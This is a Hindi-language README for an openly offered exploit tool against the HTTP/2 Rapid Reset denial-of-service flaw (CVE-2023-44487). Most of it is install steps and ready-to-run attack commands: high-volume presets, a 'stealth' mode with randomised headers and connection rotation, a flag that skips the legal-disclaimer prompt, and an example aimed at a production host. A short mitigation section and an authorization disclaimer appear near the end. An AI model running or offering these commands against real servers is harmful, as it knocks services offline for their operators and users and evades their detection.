
उन्नत CVE-2023-44487 HTTP/2 Rapid Reset भेद्यता शोषण ढांचा। इसमें मल्टी-कनेक्शन समवर्ती हमले, अनुकूली दर नियंत्रण, यादृच्छिक हेडर के साथ स्टील्थ मोड, रीयल-टाइम मेट्रिक्स, और जोखिम मूल्यांकन रिपोर्टिंग शामिल हैं। केवल अधिकृत पैठ परीक्षण के लिए। सुदीपा वानिगरत्ना द्वारा।
प्रोफेशनल एडिशन v1.0.1 | लेखक: सुदीपा वानिगरत्न
CVE-2023-44487, यानी HTTP/2 रैपिड रीसेट भेद्यता के लिए एक प्रोफेशनल-ग्रेड मूल्यांकन फ्रेमवर्क। यह टूल सुरक्षा पेशेवरों को हाल के वर्षों में खुलासा किए गए सबसे प्रभावशाली HTTP/2 DoS स्थितियों में से एक के विरुद्ध सिस्टम का परीक्षण और सत्यापन करने में मदद करता है।
यह प्रदर्शित करता है कि कैसे HTTP/2 स्ट्रीम को तेज़ी से बनाना और रीसेट करना सर्वर संसाधनों को समाप्त कर सकता है और डिनायल ऑफ सर्विस (DoS) स्थितियों को जन्म दे सकता है।
| उपयोग | परिणाम |
|---|---|
![]() | ![]() |
| गुण | मान |
|---|---|
| CVE ID | CVE-2023-44487 |
| CVSS स्कोर | 7.5 (उच्च) |
| हमला वेक्टर | नेटवर्क |
| हमले की जटिलता | निम्न |
| प्रभाव | डिनायल ऑफ सर्विस (संसाधन क्षरण) |
| प्रभावित प्रोटोकॉल | HTTP/2 |
| प्रकटीकरण तिथि | अक्टूबर 2023 |
यह भेद्यता HTTP/2 प्रोटोकॉल के स्ट्रीम प्रबंधन तंत्र का शोषण करती है:
| विशेषता | विवरण |
|---|---|
| HTTP/2 समर्थन | h2 लाइब्रेरी का उपयोग करके पूर्ण HTTP/2 प्रोटोकॉल कार्यान्वयन |
| मल्टी-कनेक्शन | कई कनेक्शनों में समवर्ती हमला |
| SSL/TLS | प्रमाणपत्र सत्यापन विकल्पों के साथ HTTPS समर्थन |
| अनुकूली दर नियंत्रण | सर्वर प्रतिक्रिया के आधार पर हमले की दर को गतिशील रूप से समायोजित करता है |
| स्टील्थ मोड | यादृच्छिक हेडर और कनेक्शन रोटेशन |
| रीयल-टाइम मॉनिटरिंग | रन के दौरान लाइव मेट्रिक्स प्रदर्शन |
| व्यापक रिपोर्ट | जोखिम मूल्यांकन के साथ JSON/CSV आउटपुट |
| Docker समर्थन | आसान परीक्षण के लिए कंटेनरीकृत डिप्लॉयमेंट |
| घटक | न्यूनतम | अनुशंसित |
|---|---|---|
| OS | Linux / macOS / Windows | Linux या macOS |
| Python | 3.7+ | 3.11+ |
| CPU | 2 कोर | 4+ कोर |
| RAM | 2GB | 4GB+ |
| नेटवर्क | 100Mbps | 1Gbps+ |
h2>=4.1.0,<5.0.0
aiohttp>=3.8.0,<4.0.0
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
# Install dependencies
pip install -r requirements.txt
# Verify installation
python3 cve-2023-44487-exploit.py --help
# Create virtual environment
python3 -m venv venv
# Activate virtual environment
# On Linux/macOS:
source venv/bin/activate
# On Windows:
venv\Scripts\activate
# Install dependencies
pip install -r requirements.txt
# Build Docker image
docker build -t cve-2023-44487-exploit .
# Run with Docker
docker run --rm cve-2023-44487-exploit target.com
# Install without requirements.txt
pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"
# Download the exploit
wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py
# Make executable
chmod +x cve-2023-44487-exploit.py
# Simple run with default settings
python3 cve-2023-44487-exploit.py example.com
# Test HTTPS on port 443
python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify
# Test HTTP on port 80
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify
| विकल्प | विवरण | डिफ़ॉल्ट |
|---|---|---|
host | लक्ष्य होस्टनाम या IP | आवश्यक |
-p, --port | लक्ष्य पोर्ट | 443 |
--no-ssl | SSL/TLS अक्षम करें | False |
--no-verify | SSL सत्यापन छोड़ें | False |
| विकल्प | विवरण | डिफ़ॉल्ट |
|---|---|---|
-c, --connections | समवर्ती कनेक्शनों की संख्या | 50 |
-s, --streams | प्रति कनेक्शन स्ट्रीम | 1000 |
-d, --duration | अवधि (सेकंड में) | 30 |
--max-streams | अधिकतम कुल स्ट्रीम | 100000 |
--delay | संचालनों के बीच आधार विलंब | 0.0001s |
| विकल्प | विवरण | डिफ़ॉल्ट |
|---|---|---|
--adaptive | अनुकूली दर नियंत्रण | True |
--target-rps | प्रति सेकंड लक्षित अनुरोध | 10000 |
--stealth | स्टील्थ मोड (यादृच्छिक हेडर) | False |
--skip-validation | लक्ष्य सत्यापन छोड़ें | False |
--force | कानूनी अस्वीकरण संकेत छोड़ें | False |
| विकल्प | विवरण | डिफ़ॉल्ट |
|---|---|---|
-o, --output | आउटपुट फ़ाइल नाम | exploit_results.json |
--format | आउटपुट प्रारूप (json / csv / console) | json |
-v, --verbose | वर्बोज़ लॉगिंग | False |
ऊपर दिए गए CLI फ़्लैग का उपयोग करके कॉनकरंसी, स्ट्रीम वॉल्यूम, अवधि और रिपोर्टिंग को ट्यून करें। प्रारंभिक सत्यापन के लिए कम -c / -s / -d मान पसंद करें, और फिर केवल उन्हीं सिस्टम पर स्केल करें जिनका स्ट्रेस-टेस्ट करने के लिए आप अधिकृत हैं।
| परिदृश्य | सुझाए गए फ़्लैग |
|---|---|
| स्मोक टेस्ट | -c 10 -s 100 -d 5 |
| मानक मूल्यांकन | -c 50 -s 1000 -d 30 |
| उच्च-लोड लैब परीक्षण | -c 100 -s 2000 -d 60 --stealth |
| अविश्वसनीय प्रमाणपत्र | --no-verify |
| प्लेन HTTP | -p 80 --no-ssl |
docker build -t cve-2023-44487-exploit .
docker run --rm cve-2023-44487-exploit target.com
docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60
docker run --rm -v "$(pwd)/results:/app/results" \
cve-2023-44487-exploit target.com -o /app/results/report.json
docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit
# Start with docker-compose
docker-compose up
# Run with a custom command
docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60
python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30
python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30
python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000
python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv
python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30
python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
-c 100 -s 2000 -d 60 --stealth -o full_report.json
| मेट्रिक | विवरण | व्याख्या |
|---|---|---|
| कुल स्ट्रीम | निर्मित स्ट्रीमों की संख्या | अधिक संख्या = अधिक लोड उत्पन्न |
| सफल रीसेट | सफलतापूर्वक रीसेट की गई स्ट्रीम | आमतौर पर भेद्य लक्ष्यों पर >90% |
| रीसेट दर (RPS) | प्रति सेकंड रीसेट | उच्च दर = अधिक प्रभावी लोड |
| सफलता दर | सफल रीसेट का प्रतिशत | >90% अक्सर संवेदनशीलता का संकेत देता है |
| कनेक्शन त्रुटियाँ | विफल कनेक्शन | कम = स्थिर कनेक्टिविटी |
| सर्वर रीसेट | सर्वर-आरंभिक रीसेट | उच्च = सुरक्षात्मक उपाय मौजूद |
| स्तर | स्कोर | अर्थ |
|---|---|---|
| गंभीर | 80–100 | सर्वर अत्यधिक भेद्य |
| उच्च | 60–79 | सर्वर भेद्य, कुछ सुरक्षा मौजूद |
| मध्यम | 40–59 | कुछ सुरक्षा लागू |
| निम्न | 0–39 | अच्छी तरह से सुरक्षित सर्वर |
================================================================================
EXPLOIT EXECUTION SUMMARY
================================================================================
Target: target.com:443
Duration: 30.00s
Total Streams: 15,234
Successful Resets: 15,198
Reset Rate: 506.6/s
Success Rate: 99.76%
Connection Errors: 0
--------------------------------------------------------------------------------
RISK ASSESSMENT
--------------------------------------------------------------------------------
Risk Level: CRITICAL
Risk Score: 95/100
Factors:
- Extremely high reset rate accepted
- Very high success rate
================================================================================
सुरक्षा पैच लागू करें
रेट लिमिटिंग लागू करें
# Nginx rate limiting example
http {
limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
limit_req zone=http2 burst=20 nodelay;
}
कनेक्शन सीमाएँ
# Limit connections per client
limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
limit_conn conn_zone 10;
| सेटिंग | अनुशंसा |
|---|---|
| अधिकतम समवर्ती स्ट्रीम | प्रति कनेक्शन 100–200 सेट करें |
| स्ट्रीम रीसेट दर | प्रति क्लाइंट <100/सेकंड तक सीमित करें |
| कनेक्शन सीमा | प्रति IP अधिकतम 50–100 कनेक्शन |
| टाइमआउट मान | निष्क्रिय टाइमआउट कम करें |
| अनुरोध आकार सीमाएँ | हेडर आकार और पेलोड सीमित करें |
# Monitor HTTP/2 connections
netstat -an | grep 443 | grep ESTABLISHED | wc -l
# Monitor reset-related log entries (example)
grep "RST_STREAM" /var/log/nginx/error.log | wc -l
महत्वपूर्ण: इस टूल का उपयोग करने से पहले इसे ध्यान से पढ़ें
यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
इस टूल का उपयोग करके, आप स्वीकार करते हैं और सहमत होते हैं कि:
इस टूल का उपयोग इनके लिए नहीं किया जाना चाहिए:
लेखक और योगदानकर्ता इस टूल को बिना किसी वारंटी के "जैसा है" (AS IS) प्रदान करते हैं। इस टूल का उपयोग आपके अपने जोखिम पर है। इस टूल के उपयोग से उत्पन्न किसी भी क्षति या कानूनी समस्या के लिए लेखक जिम्मेदार नहीं है।
इस टूल का अनधिकृत उपयोग निम्नलिखित कानूनों का उल्लंघन कर सकता है, जिनमें ये शामिल हैं, लेकिन इन्हीं तक सीमित नहीं:
सुदीपा वानिगरत्न
connection_attempts एट्रिब्यूट त्रुटि ठीक की गई--skip-validation फ़्लैग जोड़ा गयायह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है — विवरण के लिए LICENSE फ़ाइल देखें।
h2, aiohttp प्रोजेक्ट)समस्याओं और प्रश्नों के लिए:
# Quick Commands
# Test HTTPS (skip cert verify)
python3 cve-2023-44487-exploit.py target.com --no-verify
# Test HTTP
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
# Quick test (5 seconds)
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5
# Full assessment
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth
# Skip validation
python3 cve-2023-44487-exploit.py target.com --skip-validation
# Docker
docker run --rm cve-2023-44487-exploit target.com
# Help
python3 cve-2023-44487-exploit.py --help
अनुस्मारक: किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। इस टूल का उपयोग जिम्मेदारीपूर्वक और नैतिक रूप से करें।
रखरखाव: सुदीपा वानिगरत्न | अंतिम अपडेट: अगस्त 2026